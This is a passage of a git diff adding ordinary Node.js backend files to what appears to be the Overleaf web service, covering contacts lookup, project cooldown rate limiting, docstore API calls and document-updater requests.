preserve order so put them back in order + const positions = {} + for (let i = 0; i < contactIds.length; i++) { + const contactId = contactIds[i] + positions[contactId] = i + } + contacts.sort( + (a, b) => positions[a._id?.toString()] - positions[b._id?.toString()] + ) + + // Don't count holding accounts to discourage users from repeating mistakes (mistyped or wrong emails, etc) + contacts = contacts.filter(c => !c.holdingAccount) + + contacts = contacts.map(_formatContact) + + const additionalContacts = await Modules.promises.hooks.fire( + 'getContacts', + userId, + contacts + ) + + contacts = contacts.concat(...(additionalContacts || [])) + return res.json({ + contacts, + }) +} + +export default { + getContacts: expressify(getContacts), +} diff --git a/services/web/app/src/Features/Contacts/ContactManager.js b/services/web/app/src/Features/Contacts/ContactManager.js new file mode 100644 index 0000000..be5bdce --- /dev/null +++ b/services/web/app/src/Features/Contacts/ContactManager.js @@ -0,0 +1,51 @@ +const { callbackify } = require('util') +const OError = require('@overleaf/o-error') +const { fetchJson } = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') + +async function getContactIds(userId, options) { + options = options ?? 
{ limit: 50 } + + const url = new URL(`${settings.apis.contacts.url}/user/${userId}/contacts`) + + for (const [key, val] of Object.entries(options)) { + url.searchParams.set(key, val) + } + + let body + try { + body = await fetchJson(url) + } catch (err) { + throw OError.tag(err, 'failed request to contacts API', { userId }) + } + + return body?.contact_ids || [] +} + +async function addContact(userId, contactId) { + const url = new URL(`${settings.apis.contacts.url}/user/${userId}/contacts`) + + let body + try { + body = await fetchJson(url, { + method: 'POST', + json: { contact_id: contactId }, + }) + } catch (err) { + throw OError.tag(err, 'failed request to contacts API', { + userId, + contactId, + }) + } + + return body?.contact_ids || [] +} + +module.exports = { + getContactIds: callbackify(getContactIds), + addContact: callbackify(addContact), + promises: { + getContactIds, + addContact, + }, +} diff --git a/services/web/app/src/Features/Contacts/ContactRouter.mjs b/services/web/app/src/Features/Contacts/ContactRouter.mjs new file mode 100644 index 0000000..50db64f --- /dev/null +++ b/services/web/app/src/Features/Contacts/ContactRouter.mjs @@ -0,0 +1,28 @@ +import AuthenticationController from '../Authentication/AuthenticationController.js' +import SessionManager from '../Authentication/SessionManager.js' +import ContactController from './ContactController.mjs' +import Settings from '@overleaf/settings' + +function contactsAuthenticationMiddleware() { + if (!Settings.allowAnonymousReadAndWriteSharing) { + return AuthenticationController.requireLogin() + } else { + return (req, res, next) => { + if (SessionManager.isUserLoggedIn(req.session)) { + next() + } else { + res.json({ contacts: [] }) + } + } + } +} + +export default { + apply(webRouter) { + webRouter.get( + '/user/contacts', + contactsAuthenticationMiddleware(), + ContactController.getContacts + ) + }, +} diff --git a/services/web/app/src/Features/Cooldown/CooldownManager.js b/services/web/app/src/Features/Cooldown/CooldownManager.js new file mode 100644 index 0000000..67bdc98 --- /dev/null +++ b/services/web/app/src/Features/Cooldown/CooldownManager.js @@ -0,0 +1,61 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
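+//
+// Sketch of the pattern implemented below: a project is "on cooldown" while
+// the redis key Cooldown:{<projectId>} exists. putProjectOnCooldown creates
+// it roughly as
+//   SET Cooldown:{<projectId>} 1 EX 600
+// and the cooldown ends when the key expires (COOLDOWN_IN_SECONDS).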
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let CooldownManager +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const rclient = RedisWrapper.client('cooldown') +const logger = require('@overleaf/logger') +const { promisifyAll } = require('@overleaf/promise-utils') + +const COOLDOWN_IN_SECONDS = 60 * 10 + +module.exports = CooldownManager = { + _buildKey(projectId) { + return `Cooldown:{${projectId}}` + }, + + putProjectOnCooldown(projectId, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug( + { projectId }, + `[Cooldown] putting project on cooldown for ${COOLDOWN_IN_SECONDS} seconds` + ) + return rclient.set( + CooldownManager._buildKey(projectId), + '1', + 'EX', + COOLDOWN_IN_SECONDS, + callback + ) + }, + + isProjectOnCooldown(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return rclient.get( + CooldownManager._buildKey(projectId), + function (err, result) { + if (err != null) { + return callback(err) + } + return callback(null, result === '1') + } + ) + }, +} + +module.exports.promises = promisifyAll(module.exports, { + without: ['_buildKey'], +}) diff --git a/services/web/app/src/Features/Cooldown/CooldownMiddleware.mjs b/services/web/app/src/Features/Cooldown/CooldownMiddleware.mjs new file mode 100644 index 0000000..46a84eb --- /dev/null +++ b/services/web/app/src/Features/Cooldown/CooldownMiddleware.mjs @@ -0,0 +1,41 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
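+//
+// Hypothetical usage sketch (the real route wiring lives in the routers):
+//   webRouter.post(
+//     '/project/:Project_id/compile',
+//     CooldownMiddleware.freezeProject,
+//     CompileController.compile
+//   )
+// While the project is on cooldown, freezeProject replies 429 and the
+// downstream handler never runs.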
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+import CooldownManager from './CooldownManager.js'
+import logger from '@overleaf/logger'
+
+let CooldownMiddleware
+
+export default CooldownMiddleware = {
+  freezeProject(req, res, next) {
+    const projectId = req.params.Project_id
+    if (projectId == null) {
+      return next(new Error('[Cooldown] No projectId parameter on route'))
+    }
+    return CooldownManager.isProjectOnCooldown(
+      projectId,
+      function (err, projectIsOnCooldown) {
+        if (err != null) {
+          return next(err)
+        }
+        if (projectIsOnCooldown) {
+          logger.debug(
+            { projectId },
+            '[Cooldown] project is on cooldown, denying request'
+          )
+          return res.sendStatus(429)
+        }
+        return next()
+      }
+    )
+  },
+}
diff --git a/services/web/app/src/Features/Docstore/DocstoreManager.js b/services/web/app/src/Features/Docstore/DocstoreManager.js
new file mode 100644
index 0000000..5fe0f27
--- /dev/null
+++ b/services/web/app/src/Features/Docstore/DocstoreManager.js
@@ -0,0 +1,314 @@
+const { promisify } = require('util')
+const { promisifyMultiResult } = require('@overleaf/promise-utils')
+const request = require('request').defaults({ jar: false })
+const OError = require('@overleaf/o-error')
+const logger = require('@overleaf/logger')
+const settings = require('@overleaf/settings')
+const Errors = require('../Errors/Errors')
+
+const TIMEOUT = 30 * 1000 // request timeout
+
+function deleteDoc(projectId, docId, name, deletedAt, callback) {
+  const url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}`
+  const docMetaData = { deleted: true, deletedAt, name }
+  const options = { url, json: docMetaData, timeout: TIMEOUT }
+  request.patch(options, (error, res) => {
+    if (error) {
+      return callback(error)
+    }
+    if (res.statusCode >= 200 && res.statusCode < 300) {
+      callback(null)
+    } else if (res.statusCode === 404) {
+      error = new Errors.NotFoundError({
+        message: 'tried to delete doc not in docstore',
+        info: {
+          projectId,
+          docId,
+        },
+      })
+      callback(error) // maybe suppress the error when deleting a doc that is not present?
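+      // Note (illustrative): the PATCH above is a soft delete; the docstore
+      // only records { deleted: true, deletedAt, name }, so a 404 here means
+      // the doc was never in the docstore at all.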
+ } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { + projectId, + docId, + } + ) + callback(error) + } + }) +} + +/** + * @param {string} projectId + */ +function getAllDocs(projectId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/doc` + request.get( + { + url, + timeout: TIMEOUT, + json: true, + }, + (error, res, docs) => { + if (error) { + return callback(error) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, docs) + } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId } + ) + callback(error) + } + } + ) +} + +function getAllDeletedDocs(projectId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/doc-deleted` + request.get({ url, timeout: TIMEOUT, json: true }, (error, res, docs) => { + if (error) { + callback(OError.tag(error, 'could not get deleted docs from docstore')) + } else if (res.statusCode === 200) { + callback(null, docs) + } else { + callback( + new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId } + ) + ) + } + }) +} + +/** + * @param {string} projectId + * @param {Callback} callback + */ +function getAllRanges(projectId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/ranges` + request.get( + { + url, + timeout: TIMEOUT, + json: true, + }, + (error, res, docs) => { + if (error) { + return callback(error) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, docs) + } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId } + ) + callback(error) + } + } + ) +} + +function getDoc(projectId, docId, options, callback) { + if (options == null) { + options = {} + } + if (typeof options === 'function') { + callback = options + options = {} + } + const requestParams = { timeout: TIMEOUT, json: true } + if (options.peek) { + requestParams.url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}/peek` + } else { + requestParams.url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}` + } + if (options.include_deleted) { + requestParams.qs = { include_deleted: 'true' } + } + request.get(requestParams, (error, res, doc) => { + if (error) { + return callback(error) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + logger.debug( + { docId, projectId, version: doc.version, rev: doc.rev }, + 'got doc from docstore api' + ) + callback(null, doc.lines, doc.rev, doc.version, doc.ranges) + } else if (res.statusCode === 404) { + error = new Errors.NotFoundError({ + message: 'doc not found in docstore', + info: { + projectId, + docId, + }, + }) + callback(error) + } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { + projectId, + docId, + } + ) + callback(error) + } + }) +} + +function isDocDeleted(projectId, docId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}/deleted` + request.get({ url, timeout: TIMEOUT, json: true }, (err, res, body) => { + if (err) { + callback(err) + } else if (res.statusCode === 200) { + callback(null, body.deleted) + } else if (res.statusCode === 404) { + callback( + new Errors.NotFoundError({ + message: 'doc does not exist in project', + info: { projectId, docId }, + }) + ) + } else { + callback( + new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { 
projectId, docId }
+        )
+      )
+    }
+  })
+}
+
+function updateDoc(projectId, docId, lines, version, ranges, callback) {
+  const url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}`
+  request.post(
+    {
+      url,
+      timeout: TIMEOUT,
+      json: {
+        lines,
+        version,
+        ranges,
+      },
+    },
+    (error, res, result) => {
+      if (error) {
+        return callback(error)
+      }
+      if (res.statusCode >= 200 && res.statusCode < 300) {
+        logger.debug(
+          { projectId, docId },
+          'update doc in docstore url finished'
+        )
+        callback(null, result.modified, result.rev)
+      } else {
+        error = new OError(
+          `docstore api responded with non-success code: ${res.statusCode}`,
+          { projectId, docId }
+        )
+        callback(error)
+      }
+    }
+  )
+}
+
+/**
+ * Asks docstore whether any doc in the project has ranges
+ *
+ * @param {string} projectId
+ * @param {Callback} callback
+ */
+function projectHasRanges(projectId, callback) {
+  const url = `${settings.apis.docstore.url}/project/${projectId}/has-ranges`
+  request.get({ url, timeout: TIMEOUT, json: true }, (err, res, body) => {
+    if (err) {
+      return callback(err)
+    }
+    if (res.statusCode >= 200 && res.statusCode < 300) {
+      callback(null, body.projectHasRanges)
+    } else {
+      callback(
+        new OError(
+          `docstore api responded with non-success code: ${res.statusCode}`,
+          { projectId }
+        )
+      )
+    }
+  })
+}
+
+function archiveProject(projectId, callback) {
+  _operateOnProject(projectId, 'archive', callback)
+}
+
+function unarchiveProject(projectId, callback) {
+  _operateOnProject(projectId, 'unarchive', callback)
+}
+
+function destroyProject(projectId, callback) {
+  _operateOnProject(projectId, 'destroy', callback)
+}
+
+function _operateOnProject(projectId, method, callback) {
+  const url = `${settings.apis.docstore.url}/project/${projectId}/${method}`
+  logger.debug({ projectId }, `calling ${method} for project in docstore`)
+  // use default timeout for archiving/unarchiving/destroying
+  request.post(url, (err, res, docs) => {
+    if (err) {
+      OError.tag(err, `error calling ${method} project in docstore`, {
+        projectId,
+      })
+      return callback(err)
+    }
+
+    if (res.statusCode >= 200 && res.statusCode < 300) {
+      callback()
+    } else {
+      const error = new Error(
+        `docstore api responded with non-success code: ${res.statusCode}`
+      )
+      logger.warn(
+        { err: error, projectId },
+        `error calling ${method} project in docstore`
+      )
+      callback(error)
+    }
+  })
+}
+
+module.exports = {
+  deleteDoc,
+  getAllDocs,
+  getAllDeletedDocs,
+  getAllRanges,
+  getDoc,
+  isDocDeleted,
+  updateDoc,
+  projectHasRanges,
+  archiveProject,
+  unarchiveProject,
+  destroyProject,
+  promises: {
+    deleteDoc: promisify(deleteDoc),
+    getAllDocs: promisify(getAllDocs),
+    getAllDeletedDocs: promisify(getAllDeletedDocs),
+    getAllRanges: promisify(getAllRanges),
+    getDoc: promisifyMultiResult(getDoc, ['lines', 'rev', 'version', 'ranges']),
+    isDocDeleted: promisify(isDocDeleted),
+    updateDoc: promisifyMultiResult(updateDoc, ['modified', 'rev']),
+    projectHasRanges: promisify(projectHasRanges),
+    archiveProject: promisify(archiveProject),
+    unarchiveProject: promisify(unarchiveProject),
+    destroyProject: promisify(destroyProject),
+  },
+}
diff --git a/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterController.mjs b/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterController.mjs
new file mode 100644
index 0000000..d02b5a7
--- /dev/null
+++ b/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterController.mjs
@@ -0,0 +1,47 @@
+import logger from '@overleaf/logger'
+import DocumentUpdaterHandler 
from './DocumentUpdaterHandler.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import { plainTextResponse } from '../../infrastructure/Response.js' +import { expressify } from '@overleaf/promise-utils' + +async function getDoc(req, res) { + const projectId = req.params.Project_id + const docId = req.params.Doc_id + + try { + const { element: doc } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: docId, + type: 'doc', + }) + + const { lines } = await DocumentUpdaterHandler.promises.getDocument( + projectId, + docId, + -1 // latest version only + ) + + res.setContentDisposition('attachment', { filename: doc.name }) + plainTextResponse(res, lines.join('\n')) + } catch (err) { + if (err.name === 'NotFoundError') { + logger.warn( + { err, projectId, docId }, + 'entity not found when downloading doc' + ) + + return res.sendStatus(404) + } + + logger.err( + { err, projectId, docId }, + 'error getting document for downloading' + ) + + return res.sendStatus(500) + } +} + +export default { + getDoc: expressify(getDoc), +} diff --git a/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterHandler.js b/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterHandler.js new file mode 100644 index 0000000..493b812 --- /dev/null +++ b/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterHandler.js @@ -0,0 +1,656 @@ +const request = require('request').defaults({ timeout: 30 * 1000 }) +const OError = require('@overleaf/o-error') +const settings = require('@overleaf/settings') +const _ = require('lodash') +const async = require('async') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const { promisify } = require('util') +const { promisifyMultiResult } = require('@overleaf/promise-utils') +const ProjectGetter = require('../Project/ProjectGetter') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const Features = require('../../infrastructure/Features') + +function getProjectLastUpdatedAt(projectId, callback) { + _makeRequest( + { + path: `/project/${projectId}/last_updated_at`, + method: 'GET', + json: true, + }, + projectId, + 'project.redis.last_updated_at', + (err, body) => { + if (err || !body?.lastUpdatedAt) return callback(err, null) + callback(null, new Date(body.lastUpdatedAt)) + } + ) +} + +/** + * @param {string} projectId + */ +function flushProjectToMongo(projectId, callback) { + _makeRequest( + { + path: `/project/${projectId}/flush`, + method: 'POST', + }, + projectId, + 'flushing.mongo.project', + callback + ) +} + +function flushMultipleProjectsToMongo(projectIds, callback) { + const jobs = projectIds.map(projectId => callback => { + flushProjectToMongo(projectId, callback) + }) + async.series(jobs, callback) +} + +/** + * @param {string} projectId + */ +function flushProjectToMongoAndDelete(projectId, callback) { + _makeRequest( + { + path: `/project/${projectId}`, + method: 'DELETE', + }, + projectId, + 'flushing.mongo.project', + callback + ) +} + +function flushDocToMongo(projectId, docId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/flush`, + method: 'POST', + }, + projectId, + 'flushing.mongo.doc', + callback + ) +} + +function deleteDoc(projectId, docId, ignoreFlushErrors, callback) { + if (typeof ignoreFlushErrors === 'function') { + callback = ignoreFlushErrors + ignoreFlushErrors = false + } + let path = `/project/${projectId}/doc/${docId}` + if (ignoreFlushErrors) { + path += '?ignore_flush_errors=true' + } + const 
method = 'DELETE' + _makeRequest( + { + path, + method, + }, + projectId, + 'delete.mongo.doc', + callback + ) +} + +function getComment(projectId, docId, commentId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/comment/${commentId}`, + json: true, + }, + projectId, + 'get-comment', + function (error, comment) { + if (error) { + return callback(error) + } + callback(null, comment) + } + ) +} + +function getDocument(projectId, docId, fromVersion, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}?fromVersion=${fromVersion}`, + json: true, + }, + projectId, + 'get-document', + function (error, doc) { + if (error) { + return callback(error) + } + callback(null, doc.lines, doc.version, doc.ranges, doc.ops) + } + ) +} + +function setDocument(projectId, docId, userId, docLines, source, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}`, + method: 'POST', + json: { + lines: docLines, + source, + user_id: userId, + }, + }, + projectId, + 'set-document', + callback + ) +} + +function appendToDocument(projectId, docId, userId, lines, source, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/append`, + method: 'POST', + json: { + lines, + source, + user_id: userId, + }, + }, + projectId, + 'append-to-document', + callback + ) +} + +function getProjectDocsIfMatch(projectId, projectStateHash, callback) { + // If the project state hasn't changed, we can get all the latest + // docs from redis via the docupdater. Otherwise we will need to + // fall back to getting them from mongo. + const timer = new metrics.Timer('get-project-docs') + const url = `${settings.apis.documentupdater.url}/project/${projectId}/get_and_flush_if_old?state=${projectStateHash}` + request.post(url, function (error, res, body) { + timer.done() + if (error) { + OError.tag(error, 'error getting project docs from doc updater', { + url, + projectId, + }) + return callback(error) + } + if (res.statusCode === 409) { + // HTTP response code "409 Conflict" + // Docupdater has checked the projectStateHash and found that + // it has changed. This means that the docs currently in redis + // aren't the only change to the project and the full set of + // docs/files should be retreived from docstore/filestore + // instead. 
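+      // A caller can tell these two success paths apart by whether any
+      // docs came back; roughly (illustrative only):
+      //   getProjectDocsIfMatch(projectId, projectStateHash, (err, docs) => {
+      //     if (!docs) { /* state changed: fall back to docstore/filestore */ }
+      //   })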
+ callback() + } else if (res.statusCode >= 200 && res.statusCode < 300) { + let docs + try { + docs = JSON.parse(body) + } catch (error1) { + return callback(OError.tag(error1)) + } + callback(null, docs) + } else { + callback( + new OError( + `doc updater returned a non-success status code: ${res.statusCode}`, + { + projectId, + url, + } + ) + ) + } + }) +} + +function clearProjectState(projectId, callback) { + _makeRequest( + { + path: `/project/${projectId}/clearState`, + method: 'POST', + }, + projectId, + 'clear-project-state', + callback + ) +} + +function acceptChanges(projectId, docId, changeIds, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/change/accept`, + json: { change_ids: changeIds }, + method: 'POST', + }, + projectId, + 'accept-changes', + callback + ) +} + +function resolveThread(projectId, docId, threadId, userId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/comment/${threadId}/resolve`, + method: 'POST', + json: { + user_id: userId, + }, + }, + projectId, + 'resolve-thread', + callback + ) +} + +function reopenThread(projectId, docId, threadId, userId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/comment/${threadId}/reopen`, + method: 'POST', + json: { + user_id: userId, + }, + }, + projectId, + 'reopen-thread', + callback + ) +} + +function deleteThread(projectId, docId, threadId, userId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/comment/${threadId}`, + method: 'DELETE', + json: { + user_id: userId, + }, + }, + projectId, + 'delete-thread', + callback + ) +} + +function resyncProjectHistory( + projectId, + projectHistoryId, + docs, + files, + opts, + callback +) { + docs = docs.map(doc => ({ + doc: doc.doc._id, + path: doc.path, + })) + const hasFilestore = Features.hasFeature('filestore') + if (!hasFilestore) { + // Files without a hash likely do not have a blob. Abort. + for (const { file } of files) { + if (!file.hash) { + return callback( + new OError('found file with missing hash', { projectId, file }) + ) + } + } + } + files = files.map(file => ({ + file: file.file._id, + path: file.path, + url: hasFilestore + ? 
FileStoreHandler._buildUrl(projectId, file.file._id) + : undefined, + _hash: file.file.hash, + createdBlob: !hasFilestore, + metadata: buildFileMetadataForHistory(file.file), + })) + + const body = { docs, files, projectHistoryId } + if (opts.historyRangesMigration) { + body.historyRangesMigration = opts.historyRangesMigration + } + if (opts.resyncProjectStructureOnly) { + body.resyncProjectStructureOnly = opts.resyncProjectStructureOnly + } + _makeRequest( + { + path: `/project/${projectId}/history/resync`, + json: body, + method: 'POST', + timeout: 6 * 60 * 1000, // allow 6 minutes for resync + }, + projectId, + 'resync-project-history', + callback + ) +} + +/** + * Block a project from being loaded in docupdater + * + * @param {string} projectId + * @param {Callback} callback + */ +function blockProject(projectId, callback) { + _makeRequest( + { path: `/project/${projectId}/block`, method: 'POST', json: true }, + projectId, + 'block-project', + (err, body) => { + if (err) { + return callback(err) + } + callback(null, body.blocked) + } + ) +} + +/** + * Unblock a previously blocked project + * + * @param {string} projectId + * @param {Callback} callback + */ +function unblockProject(projectId, callback) { + _makeRequest( + { path: `/project/${projectId}/unblock`, method: 'POST', json: true }, + projectId, + 'unblock-project', + (err, body) => { + if (err) { + return callback(err) + } + callback(null, body.wasBlocked) + } + ) +} + +function updateProjectStructure( + projectId, + projectHistoryId, + userId, + changes, + source, + callback +) { + if ( + settings.apis.project_history == null || + !settings.apis.project_history.sendProjectStructureOps + ) { + return callback() + } + + ProjectGetter.getProjectWithoutLock( + projectId, + { overleaf: true }, + (err, project) => { + if (err) { + return callback(err) + } + const historyRangesSupport = _.get( + project, + 'overleaf.history.rangesSupportEnabled', + false + ) + const { + deletes: docDeletes, + adds: docAdds, + renames: docRenames, + } = _getUpdates( + 'doc', + changes.oldDocs, + changes.newDocs, + historyRangesSupport + ) + const hasFilestore = Features.hasFeature('filestore') + if (!hasFilestore) { + for (const newEntity of changes.newFiles || []) { + if (!newEntity.file.hash) { + // Files without a hash likely do not have a blob. Abort. 
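+            // When the filestore is off, the add-file update is sent with
+            // createdBlob and only this hash to locate the content in
+            // history, so a missing hash is unrecoverable here.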
+ return callback( + new OError('found file with missing hash', { newEntity }) + ) + } + } + } + const { + deletes: fileDeletes, + adds: fileAdds, + renames: fileRenames, + } = _getUpdates( + 'file', + changes.oldFiles, + changes.newFiles, + historyRangesSupport + ) + const updates = [].concat( + docDeletes, + fileDeletes, + docAdds, + fileAdds, + docRenames, + fileRenames + ) + const projectVersion = + changes && changes.newProject && changes.newProject.version + + if (updates.length < 1) { + return callback() + } + + if (projectVersion == null) { + logger.warn( + { projectId, changes, projectVersion }, + 'did not receive project version in changes' + ) + return callback(new Error('did not receive project version in changes')) + } + + _makeRequest( + { + path: `/project/${projectId}`, + json: { + updates, + userId, + version: projectVersion, + projectHistoryId, + source, + }, + method: 'POST', + }, + projectId, + 'update-project-structure', + callback + ) + } + ) +} + +function _makeRequest(options, projectId, metricsKey, callback) { + const timer = new metrics.Timer(metricsKey) + request( + { + url: `${settings.apis.documentupdater.url}${options.path}`, + json: options.json, + method: options.method || 'GET', + timeout: options.timeout || 30 * 1000, + }, + function (error, res, body) { + timer.done() + if (error) { + logger.warn( + { error, projectId }, + 'error making request to document updater' + ) + callback(error) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, body) + } else { + error = new Error( + `document updater returned a failure status code: ${res.statusCode}` + ) + logger.warn( + { error, projectId }, + `document updater returned failure status code: ${res.statusCode}` + ) + callback(error) + } + } + ) +} + +function _getUpdates( + entityType, + oldEntities, + newEntities, + historyRangesSupport +) { + if (!oldEntities) { + oldEntities = [] + } + if (!newEntities) { + newEntities = [] + } + const deletes = [] + const adds = [] + const renames = [] + + const oldEntitiesHash = _.keyBy(oldEntities, entity => + entity[entityType]._id.toString() + ) + const newEntitiesHash = _.keyBy(newEntities, entity => + entity[entityType]._id.toString() + ) + + // Send deletes before adds (and renames) to keep a 1:1 mapping between + // paths and ids + // + // When a file is replaced, we first delete the old file and then add the + // new file. If the 'add' operation is sent to project history before the + // 'delete' then we would have two files with the same path at that point + // in time. + for (const id in oldEntitiesHash) { + const oldEntity = oldEntitiesHash[id] + const newEntity = newEntitiesHash[id] + + if (newEntity == null) { + // entity deleted + deletes.push({ + type: `rename-${entityType}`, + id, + pathname: oldEntity.path, + newPathname: '', + }) + } + } + const hasFilestore = Features.hasFeature('filestore') + + for (const id in newEntitiesHash) { + const newEntity = newEntitiesHash[id] + const oldEntity = oldEntitiesHash[id] + + if (oldEntity == null) { + // entity added + adds.push({ + type: `add-${entityType}`, + id, + pathname: newEntity.path, + docLines: newEntity.docLines, + ranges: newEntity.ranges, + historyRangesSupport, + url: newEntity.file != null && hasFilestore ? newEntity.url : undefined, + hash: newEntity.file != null ? newEntity.file.hash : undefined, + metadata: buildFileMetadataForHistory(newEntity.file), + createdBlob: (newEntity.createdBlob || !hasFilestore) ?? 
false, + }) + } else if (newEntity.path !== oldEntity.path) { + // entity renamed + renames.push({ + type: `rename-${entityType}`, + id, + pathname: oldEntity.path, + newPathname: newEntity.path, + }) + } + } + + return { deletes, adds, renames } +} + +function buildFileMetadataForHistory(file) { + if (!file?.linkedFileData) return undefined + + const metadata = { + // Files do not have a created at timestamp in the history. + // For cloned projects, the importedAt timestamp needs to remain untouched. + // Record the timestamp in the metadata blob to keep everything self-contained. + importedAt: file.created, + ...file.linkedFileData, + } + if (metadata.provider === 'project_output_file') { + // The build-id and clsi-server-id are only used for downloading file. + // Omit them from history as they are not useful in the future. + delete metadata.build_id + delete metadata.clsiServerId + } + return metadata +} + +module.exports = { + flushProjectToMongo, + flushMultipleProjectsToMongo, + flushProjectToMongoAndDelete, + flushDocToMongo, + deleteDoc, + getComment, + getDocument, + getProjectLastUpdatedAt, + setDocument, + appendToDocument, + getProjectDocsIfMatch, + clearProjectState, + acceptChanges, + resolveThread, + reopenThread, + deleteThread, + resyncProjectHistory, + blockProject, + unblockProject, + updateProjectStructure, + promises: { + flushProjectToMongo: promisify(flushProjectToMongo), + flushMultipleProjectsToMongo: promisify(flushMultipleProjectsToMongo), + flushProjectToMongoAndDelete: promisify(flushProjectToMongoAndDelete), + flushDocToMongo: promisify(flushDocToMongo), + deleteDoc: promisify(deleteDoc), + getComment: promisify(getComment), + getDocument: promisifyMultiResult(getDocument, [ + 'lines', + 'version', + 'ranges', + 'ops', + ]), + setDocument: promisify(setDocument), + getProjectDocsIfMatch: promisify(getProjectDocsIfMatch), + getProjectLastUpdatedAt: promisify(getProjectLastUpdatedAt), + clearProjectState: promisify(clearProjectState), + acceptChanges: promisify(acceptChanges), + resolveThread: promisify(resolveThread), + reopenThread: promisify(reopenThread), + deleteThread: promisify(deleteThread), + resyncProjectHistory: promisify(resyncProjectHistory), + blockProject: promisify(blockProject), + unblockProject: promisify(unblockProject), + updateProjectStructure: promisify(updateProjectStructure), + appendToDocument: promisify(appendToDocument), + }, +} diff --git a/services/web/app/src/Features/Documents/DocumentController.mjs b/services/web/app/src/Features/Documents/DocumentController.mjs new file mode 100644 index 0000000..6886414 --- /dev/null +++ b/services/web/app/src/Features/Documents/DocumentController.mjs @@ -0,0 +1,95 @@ +import ChatApiHandler from '../Chat/ChatApiHandler.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import ProjectEntityHandler from '../Project/ProjectEntityHandler.js' +import ProjectEntityUpdateHandler from '../Project/ProjectEntityUpdateHandler.js' +import logger from '@overleaf/logger' +import _ from 'lodash' +import { plainTextResponse } from '../../infrastructure/Response.js' +import { expressify } from '@overleaf/promise-utils' + +async function getDocument(req, res) { + const { Project_id: projectId, doc_id: docId } = req.params + const plain = req.query.plain === 'true' + const peek = req.query.peek === 'true' + const project = await ProjectGetter.promises.getProject(projectId, { + rootFolder: true, + overleaf: true, + }) + if (!project) { + return 
res.sendStatus(404) + } + + const { path } = await ProjectLocator.promises.findElement({ + project, + element_id: docId, + type: 'doc', + }) + + const { lines, version, ranges } = await ProjectEntityHandler.promises.getDoc( + projectId, + docId, + { peek } + ) + + const resolvedCommentIdsInProject = + await ChatApiHandler.promises.getResolvedThreadIds(projectId) + + const commentIdsInDoc = new Set( + ranges?.comments?.map(comment => comment.id) ?? [] + ) + + const resolvedCommentIds = resolvedCommentIdsInProject.filter(commentId => + commentIdsInDoc.has(commentId) + ) + + if (plain) { + plainTextResponse(res, lines.join('\n')) + } else { + const projectHistoryId = _.get(project, 'overleaf.history.id') + const historyRangesSupport = _.get( + project, + 'overleaf.history.rangesSupportEnabled', + false + ) + + // all projects are now migrated to Full Project History, keeping the field + // for API compatibility + const projectHistoryType = 'project-history' + + res.json({ + lines, + version, + ranges, + pathname: path.fileSystem, + projectHistoryId, + projectHistoryType, + historyRangesSupport, + resolvedCommentIds, + }) + } +} + +async function setDocument(req, res) { + const { Project_id: projectId, doc_id: docId } = req.params + const { lines, version, ranges, lastUpdatedAt, lastUpdatedBy } = req.body + const result = await ProjectEntityUpdateHandler.promises.updateDocLines( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy + ) + logger.debug( + { docId, projectId }, + 'finished receiving set document request from api (docupdater)' + ) + res.json(result) +} + +export default { + getDocument: expressify(getDocument), + setDocument: expressify(setDocument), +} diff --git a/services/web/app/src/Features/Documents/DocumentHelper.js b/services/web/app/src/Features/Documents/DocumentHelper.js new file mode 100644 